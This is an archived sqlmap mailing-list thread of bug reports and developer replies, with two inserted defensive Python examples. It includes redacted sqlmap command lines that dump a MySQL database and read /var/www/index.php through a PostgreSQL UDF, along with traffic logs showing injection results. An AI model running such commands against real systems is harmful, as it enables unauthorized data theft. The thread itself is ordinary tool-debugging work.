>> Content-type: text/html
>> Location: https://removed/removed.shtml
>> Cache-control: private
>> [14:07:02] [TRAFFIC IN] HTTP response [#2] (302 Moved Temporarily):
>>
>> In the body of the first HTTP Response, the 302 temporary redirect, is
>> the result of the SQL injection.
>>
>> If I don't follow the redirection then I see the result. This is fine (to
>> me at least), I just didn't realise or expect it at first. I expected that
>> verbose 6 would show all of the responses, particularly those that contain
>> the results that sqlmap is returning.
>>
>> Cheers,
>> Abu
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2012-12-07 10:22:28
Hi.

Sorry for waiting. Opened a new issue for this one [1]. Will try to finish it today.

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/288

On Mon, Nov 12, 2012 at 4:20 AM, Abuse 007 <abu...@gm...> wrote:
> Hi,
>
> When looking at HTTP Requests and Response, by using verbose level 6 (-v
> 6), sqlmap does not show the full HTTP response with the HTTP 302 Moved
> Temporarily.
>
> sqlmap got a 302 redirect to 'http://removed/removed.shtml'. Do you want
> to follow? [Y/n] y
> [14:07:02] [INFO] heuristics detected web page charset 'ascii'
> [14:07:02] [TRAFFIC IN] HTTP response [#2] (302 Object Moved):
> Connection: close
> Content-type: text/html
> Location: https://removed/removed.shtml
> Cache-control: private
> [14:07:02] [TRAFFIC IN] HTTP response [#2] (302 Moved Temporarily):
>
> In the body of the first HTTP Response, the 302 temporary redirect, is the
> result of the SQL injection.
>
> If I don't follow the redirection then I see the result. This is fine (to
> me at least), I just didn't realise or expect it at first. I expected that
> verbose 6 would show all of the responses, particularly those that contain
> the results that sqlmap is returning.
>
> Cheers,
> Abu

--
Miroslav Stampar
http://about.me/stamparm
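The report quoted above turns on a redirect response that carries page content in its body, which any client that does not follow the redirect can read. As an added example (not code from sqlmap or from this thread), the following Python check parses captured raw HTTP responses and flags 3xx responses whose body holds more than a stock "moved" stub; the function names, the 64-character threshold and the sample responses are assumptions constructed for illustration.

```python
import http.client
import io
import re

# Assumption: visible text longer than this is more than a stock redirect stub.
STUB_TEXT_LIMIT = 64


class _BytesSocket:
    """Minimal socket stand-in so http.client can parse bytes captured offline."""

    def __init__(self, raw):
        self._raw = raw

    def makefile(self, *args, **kwargs):
        return io.BytesIO(self._raw)


def parse_response(raw):
    """Parse one raw HTTP response into (status, lower-cased headers, body)."""
    resp = http.client.HTTPResponse(_BytesSocket(raw))
    resp.begin()
    body = resp.read()
    headers = {name.lower(): value for name, value in resp.getheaders()}
    return resp.status, headers, body


def visible_text(body):
    """Strip tags and collapse whitespace to approximate what a reader sees."""
    text = re.sub(rb"<[^>]*>", b" ", body)
    return b" ".join(text.split()).decode("latin-1")


def audit_redirect(raw):
    """Report whether a redirect response also delivers page content."""
    status, headers, body = parse_response(raw)
    is_redirect = 300 <= status < 400 and "location" in headers
    return {
        "status": status,
        "location": headers.get("location"),
        "body_bytes": len(body),
        "flagged": is_redirect and len(visible_text(body)) > STUB_TEXT_LIMIT,
    }


# Constructed sample responses (not taken from the thread).
_HEAD = (b"HTTP/1.1 302 Object Moved\r\nConnection: close\r\n"
         b"Content-Type: text/html\r\n"
         b"Location: https://app.example/login.shtml\r\n\r\n")

# A normal redirect: the body is only the usual "moved" link.
STUB_RESPONSE = _HEAD + (b"<html><body>Object moved to "
                         b"<a href=\"https://app.example/login.shtml\">here</a>."
                         b"</body></html>")

# The page was rendered anyway and sent along with the redirect.
LEAKY_RESPONSE = _HEAD + (
    b"<html><body><h1>Order history</h1><table>"
    b"<tr><td>1001</td><td>alice@example.test</td><td>shipped</td></tr>"
    b"<tr><td>1002</td><td>bob@example.test</td><td>pending</td></tr>"
    b"</table></body></html>")

# A plain 200 page is out of scope for this check, however long its body.
OK_RESPONSE = (b"HTTP/1.1 200 OK\r\nConnection: close\r\n"
               b"Content-Type: text/html\r\n\r\n" + b"<p>" + b"word " * 40 + b"</p>")

if __name__ == "__main__":
    for name, raw in (("stub", STUB_RESPONSE), ("leaky", LEAKY_RESPONSE),
                      ("ok", OK_RESPONSE)):
        print(name, audit_redirect(raw))
```

A flagged response means the handler kept producing output after issuing the redirect; the fix belongs in the application, which should stop processing once the redirect is sent.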
From: Miroslav S. <mir...@gm...> - 2012-12-07 09:58:01
Hi.

It should be fixed now ;)

Bye

On Fri, Dec 7, 2012 at 7:51 AM, Leon Jacobs <leo...@gm...> wrote:
> On Fri, Dec 7, 2012 at 8:49 AM, Leon Jacobs <leo...@gm...> wrote:
>
>> Hi,
>>
>> I am getting this exception when trying to read files from disk. It is
>> postgres backend. The exception occurs right after:
>>
>
> Apologies, sent too fast.
>
> Exception occurs right after:
>
> [08:49:29] [INFO] creating UDF 'sys_fileread' from the binary UDF file
>
>> sqlmap version: 1.0-dev-b5c8707
>> Python version: 2.7.2
>> Operating system: posix
>> Command line: ./sqlmap.py -u **********************************
>> --file-read=/var/www/index.php
>> Technique: STACKED
>> Back-end DBMS: PostgreSQL (fingerprinted)
>> Traceback (most recent call last):
>> File "/sqlmap-dev/_sqlmap.py", line 73, in main
>> start()
>> File "/sqlmap-dev/lib/controller/controller.py", line 564, in start
>> action()
>> File "/sqlmap-dev/lib/controller/action.py", line 150, in action
>> conf.dumper.rFile(conf.rFile, conf.dbmsHandler.readFile(conf.rFile))
>> File "/sqlmap-dev/plugins/generic/filesystem.py", line 233, in readFile
>> fileContent = self._unhexString(fileContent)
>> File "/sqlmap-dev/plugins/generic/filesystem.py", line 40, in
>> _unhexString
>> if len(hexStr) % 2 != 0:
>> TypeError: object of type 'NoneType' has no len()
>>
>> [*] shutting down at 08:46:11
>>
>
> --
> Regards
> L.
>
> Sent using electronic mail ツ

--
Miroslav Stampar
http://about.me/stamparm
From: Leon J. <leo...@gm...> - 2012-12-07 06:51:21
On Fri, Dec 7, 2012 at 8:49 AM, Leon Jacobs <leo...@gm...> wrote:
> Hi,
>
> I am getting this exception when trying to read files from disk. It is
> postgres backend. The exception occurs right after:
>

Apologies, sent too fast.

Exception occurs right after:

[08:49:29] [INFO] creating UDF 'sys_fileread' from the binary UDF file

> sqlmap version: 1.0-dev-b5c8707
> Python version: 2.7.2
> Operating system: posix
> Command line: ./sqlmap.py -u **********************************
> --file-read=/var/www/index.php
> Technique: STACKED
> Back-end DBMS: PostgreSQL (fingerprinted)
> Traceback (most recent call last):
> File "/sqlmap-dev/_sqlmap.py", line 73, in main
> start()
> File "/sqlmap-dev/lib/controller/controller.py", line 564, in start
> action()
> File "/sqlmap-dev/lib/controller/action.py", line 150, in action
> conf.dumper.rFile(conf.rFile, conf.dbmsHandler.readFile(conf.rFile))
> File "/sqlmap-dev/plugins/generic/filesystem.py", line 233, in readFile
> fileContent = self._unhexString(fileContent)
> File "/sqlmap-dev/plugins/generic/filesystem.py", line 40, in
> _unhexString
> if len(hexStr) % 2 != 0:
> TypeError: object of type 'NoneType' has no len()
>
> [*] shutting down at 08:46:11
>

--
Regards
L.

Sent using electronic mail ツ
From: Leon J. <leo...@gm...> - 2012-12-07 06:50:00
Hi,

I am getting this exception when trying to read files from disk. It is postgres backend. The exception occurs right after:

sqlmap version: 1.0-dev-b5c8707
Python version: 2.7.2
Operating system: posix
Command line: ./sqlmap.py -u ********************************** --file-read=/var/www/index.php
Technique: STACKED
Back-end DBMS: PostgreSQL (fingerprinted)
Traceback (most recent call last):
  File "/sqlmap-dev/_sqlmap.py", line 73, in main
    start()
  File "/sqlmap-dev/lib/controller/controller.py", line 564, in start
    action()
  File "/sqlmap-dev/lib/controller/action.py", line 150, in action
    conf.dumper.rFile(conf.rFile, conf.dbmsHandler.readFile(conf.rFile))
  File "/sqlmap-dev/plugins/generic/filesystem.py", line 233, in readFile
    fileContent = self._unhexString(fileContent)
  File "/sqlmap-dev/plugins/generic/filesystem.py", line 40, in _unhexString
    if len(hexStr) % 2 != 0:
TypeError: object of type 'NoneType' has no len()

[*] shutting down at 08:46:11

--
Regards
L.

Sent using electronic mail ツ
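The traceback above ends with `len(hexStr)` being called on `None`, meaning the retrieval step handed nothing to the hex decoder; the same decoding step applies to the hex-encoded BLOB values discussed in the earlier `--hex` thread. As an added example (not sqlmap's own code), this decoder separates "nothing retrieved" from an empty value and from damaged hex instead of failing with `TypeError`; the names `unhex_retrieved` and `HexDecodeError` and the sample values are assumptions.

```python
import binascii
import string

_HEX_DIGITS = frozenset(string.hexdigits)


class HexDecodeError(ValueError):
    """A value was retrieved but it is not well-formed hex."""


def unhex_retrieved(value):
    """Decode hex text returned by a query (for example HEX(column)) to bytes.

    Returns None when nothing was retrieved, b"" for an empty value, and
    raises HexDecodeError (with the reason) when the text is damaged.
    """
    if value is None:
        # Nothing came back: report that to the caller, do not call len() on it.
        return None
    if isinstance(value, bytes):
        value = value.decode("ascii", errors="replace")

    # Retrieved output may be wrapped or padded; whitespace carries no data.
    cleaned = "".join(value.split())
    if cleaned[:2].lower() == "0x":
        cleaned = cleaned[2:]

    for offset, char in enumerate(cleaned):
        if char not in _HEX_DIGITS:
            raise HexDecodeError(
                "non-hex character %r at offset %d" % (char, offset))
    if len(cleaned) % 2 != 0:
        raise HexDecodeError(
            "odd number of hex digits (%d), value looks truncated" % len(cleaned))
    return binascii.unhexlify(cleaned)


def describe(value):
    """Turn the three outcomes into a message a user can act on."""
    try:
        data = unhex_retrieved(value)
    except HexDecodeError as exc:
        return "retrieved value is corrupt: %s" % exc
    if data is None:
        return "nothing retrieved (query returned no value)"
    return "decoded %d byte(s)" % len(data)


# Constructed sample values (not taken from the thread).
SAMPLES = [None, "", "3C3F706870", "0x7f45 4c46\n", "3C3", "3C3G"]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(repr(sample), "->", describe(sample))
```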
From: Miroslav S. <mir...@gm...> - 2012-11-30 09:36:20
Hi Alexander.

I can see what's happening (at first glance it seems obvious, but it's really not :). It would be a tremendous help if you could send me a traffic file (just append --fresh-queries -t traffic.txt to those parameters used) where this happens.

Kind regards,
Miroslav Stampar

On Fri, Nov 30, 2012 at 10:05 AM, Miroslav Stampar <mir...@gm...> wrote:
> Hi.
>
> Thank you for your report. This moment opened a new issue for it [1]. Will
> keep you posted.
>
> Kind regards,
> Miroslav Stampar
>
> [1] https://github.com/sqlmapproject/sqlmap/issues/268
>
> On Fri, Nov 30, 2012 at 7:49 AM, Alexander Hagenah <ah...@pr...> wrote:
>
>> Hi List,
>>
>> another glitch I ran into. Let me know if you need further info.
>>
>> [07:47:38] [ERROR] thread MainThread: unhandled exception in
>> sqlmap/1.0-dev-6ea07f7, retry your run with the latest development
>> version from the GitHub repository. If the exception persists, please
>> send by e-mail to 'sql...@li...' or open a new
>> issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the
>> following text and any information required to reproduce the bug. The
>> developers will try to reproduce the bug, fix it accordingly and get
>> back to you.
>> sqlmap version: 1.0-dev-6ea07f7
>> Python version: 2.7.3rc2
>> Operating system: posix
>> Command line: ./sqlmap.py -u
>> ******************************************** -D *********** --dump
>> Technique: ERROR
>> Back-end DBMS: MySQL (fingerprinted)
>> Traceback (most recent call last):
>> File "/home/tools/sqlmap/lib/core/threads.py", line 130, in runThreads
>> threadFunction()
>> File "/home/tools/sqlmap/lib/techniques/error/use.py", line 387, in
>> errorThread
>> output = __errorFields(expression, expressionFields,
>> expressionFieldsList, num, emptyFields)
>> File "/home/tools/sqlmap/lib/techniques/error/use.py", line 181, in
>> __errorFields
>> output = NULL if emptyFields and field in emptyFields else
>> __oneShotErrorUse(expressionReplaced, field)
>> File "/home/tools/sqlmap/lib/techniques/error/use.py", line 95, in
>> __oneShotErrorUse
>> page, headers = Request.queryPage(payload, content=True)
>> File "/home/tools/sqlmap/lib/request/connect.py", line 764, in queryPage
>> page, headers, code = Connect.getPage(url=uri, get=get, post=post,
>> cookie=cookie, ua=ua, referer=referer, host=host, silent=silent,
>> method=method, auxHeaders=auxHeaders, response=response,
>> raise404=raise404, ignoreTimeout=timeBasedCompare)
>> File "/home/tools/sqlmap/lib/request/connect.py", line 402, in getPage
>> return Connect.__getPageProxy(**kwargs)
>> File "/home/tools/sqlmap/lib/request/connect.py", line 91, in
>> __getPageProxy
>> return Connect.getPage(**kwargs)
>> File "/home/tools/sqlmap/lib/request/connect.py", line 348, in getPage
>> conn = urllib2.urlopen(req)
>> File "/usr/lib/python2.7/urllib2.py", line 126, in urlopen
>> return _opener.open(url, data, timeout)
>> File "/usr/lib/python2.7/urllib2.py", line 400, in open
>> response = self._open(req, data)
>> File "/usr/lib/python2.7/urllib2.py", line 418, in _open
>> '_open', req)
>> File "/usr/lib/python2.7/urllib2.py", line 378, in _call_chain
>> result = func(*args)
>> File "/usr/lib/python2.7/urllib2.py", line 1207, in http_open
>> return self.do_open(httplib.HTTPConnection, req)
>> File "/usr/lib/python2.7/urllib2.py", line 1146, in do_open
>> h = http_class(host, timeout=req.timeout) # will parse host:port
>> File "/usr/lib/python2.7/httplib.py", line 693, in __init__
>> self._set_hostport(host, port)
>> File "/usr/lib/python2.7/httplib.py", line 721, in _set_hostport
>> raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
>> InvalidURL: nonnumeric port: '1' for key 'group_key''
>>
>> --
>> Alexander Hagenah
>>
>> Dubai, UAE.
>> Mobile: +971 (0)50 6448151
>>
>> Key ID (2048bit): 0x354C0DDB
>> Fingerprint: FBA1 439F 7343 3729 18AF D62C 54DE FD22 354C 0DDB
>
> --
> Miroslav Stampar
> http://about.me/stamparm

--
Miroslav Stampar
http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2012-11-30 09:05:33
Hi.

Thank you for your report. This moment opened a new issue for it [1]. Will keep you posted.

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/issues/268

On Fri, Nov 30, 2012 at 7:49 AM, Alexander Hagenah <ah...@pr...> wrote:
> Hi List,
>
> another glitch I ran into. Let me know if you need further info.
>
> [07:47:38] [ERROR] thread MainThread: unhandled exception in
> sqlmap/1.0-dev-6ea07f7, retry your run with the latest development
> version from the GitHub repository. If the exception persists, please
> send by e-mail to 'sql...@li...' or open a new
> issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the
> following text and any information required to reproduce the bug. The
> developers will try to reproduce the bug, fix it accordingly and get
> back to you.
> sqlmap version: 1.0-dev-6ea07f7
> Python version: 2.7.3rc2
> Operating system: posix
> Command line: ./sqlmap.py -u
> ******************************************** -D *********** --dump
> Technique: ERROR
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
> File "/home/tools/sqlmap/lib/core/threads.py", line 130, in runThreads
> threadFunction()
> File "/home/tools/sqlmap/lib/techniques/error/use.py", line 387, in
> errorThread
> output = __errorFields(expression, expressionFields,
> expressionFieldsList, num, emptyFields)
> File "/home/tools/sqlmap/lib/techniques/error/use.py", line 181, in
> __errorFields
> output = NULL if emptyFields and field in emptyFields else
> __oneShotErrorUse(expressionReplaced, field)
> File "/home/tools/sqlmap/lib/techniques/error/use.py", line 95, in
> __oneShotErrorUse
> page, headers = Request.queryPage(payload, content=True)
> File "/home/tools/sqlmap/lib/request/connect.py", line 764, in queryPage
> page, headers, code = Connect.getPage(url=uri, get=get, post=post,
> cookie=cookie, ua=ua, referer=referer, host=host, silent=silent,
> method=method, auxHeaders=auxHeaders, response=response,
> raise404=raise404, ignoreTimeout=timeBasedCompare)
> File "/home/tools/sqlmap/lib/request/connect.py", line 402, in getPage
> return Connect.__getPageProxy(**kwargs)
> File "/home/tools/sqlmap/lib/request/connect.py", line 91, in
> __getPageProxy
> return Connect.getPage(**kwargs)
> File "/home/tools/sqlmap/lib/request/connect.py", line 348, in getPage
> conn = urllib2.urlopen(req)
> File "/usr/lib/python2.7/urllib2.py", line 126, in urlopen
> return _opener.open(url, data, timeout)
> File "/usr/lib/python2.7/urllib2.py", line 400, in open
> response = self._open(req, data)
> File "/usr/lib/python2.7/urllib2.py", line 418, in _open
> '_open', req)
> File "/usr/lib/python2.7/urllib2.py", line 378, in _call_chain
> result = func(*args)
> File "/usr/lib/python2.7/urllib2.py", line 1207, in http_open
> return self.do_open(httplib.HTTPConnection, req)
> File "/usr/lib/python2.7/urllib2.py", line 1146, in do_open
> h = http_class(host, timeout=req.timeout) # will parse host:port
> File "/usr/lib/python2.7/httplib.py", line 693, in __init__
> self._set_hostport(host, port)
> File "/usr/lib/python2.7/httplib.py", line 721, in _set_hostport
> raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
> InvalidURL: nonnumeric port: '1' for key 'group_key''
>
> --
> Alexander Hagenah
>
> Dubai, UAE.
> Mobile: +971 (0)50 6448151
>
> Key ID (2048bit): 0x354C0DDB
> Fingerprint: FBA1 439F 7343 3729 18AF D62C 54DE FD22 354C 0DDB

--
Miroslav Stampar
http://about.me/stamparm
From: Alexander H. <ah...@pr...> - 2012-11-30 07:07:55
Hi List,

another glitch I ran into. Let me know if you need further info.

[07:47:38] [ERROR] thread MainThread: unhandled exception in sqlmap/1.0-dev-6ea07f7, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev-6ea07f7
Python version: 2.7.3rc2
Operating system: posix
Command line: ./sqlmap.py -u ******************************************** -D *********** --dump
Technique: ERROR
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
  File "/home/tools/sqlmap/lib/core/threads.py", line 130, in runThreads
    threadFunction()
  File "/home/tools/sqlmap/lib/techniques/error/use.py", line 387, in errorThread
    output = __errorFields(expression, expressionFields, expressionFieldsList, num, emptyFields)
  File "/home/tools/sqlmap/lib/techniques/error/use.py", line 181, in __errorFields
    output = NULL if emptyFields and field in emptyFields else __oneShotErrorUse(expressionReplaced, field)
  File "/home/tools/sqlmap/lib/techniques/error/use.py", line 95, in __oneShotErrorUse
    page, headers = Request.queryPage(payload, content=True)
  File "/home/tools/sqlmap/lib/request/connect.py", line 764, in queryPage
    page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare)
  File "/home/tools/sqlmap/lib/request/connect.py", line 402, in getPage
    return Connect.__getPageProxy(**kwargs)
  File "/home/tools/sqlmap/lib/request/connect.py", line 91, in __getPageProxy
    return Connect.getPage(**kwargs)
  File "/home/tools/sqlmap/lib/request/connect.py", line 348, in getPage
    conn = urllib2.urlopen(req)
  File "/usr/lib/python2.7/urllib2.py", line 126, in urlopen
    return _opener.open(url, data, timeout)
  File "/usr/lib/python2.7/urllib2.py", line 400, in open
    response = self._open(req, data)
  File "/usr/lib/python2.7/urllib2.py", line 418, in _open
    '_open', req)
  File "/usr/lib/python2.7/urllib2.py", line 378, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/urllib2.py", line 1207, in http_open
    return self.do_open(httplib.HTTPConnection, req)
  File "/usr/lib/python2.7/urllib2.py", line 1146, in do_open
    h = http_class(host, timeout=req.timeout) # will parse host:port
  File "/usr/lib/python2.7/httplib.py", line 693, in __init__
    self._set_hostport(host, port)
  File "/usr/lib/python2.7/httplib.py", line 721, in _set_hostport
    raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
InvalidURL: nonnumeric port: '1' for key 'group_key''

--
Alexander Hagenah

Dubai, UAE.
Mobile: +971 (0)50 6448151

Key ID (2048bit): 0x354C0DDB
Fingerprint: FBA1 439F 7343 3729 18AF D62C 54DE FD22 354C 0DDB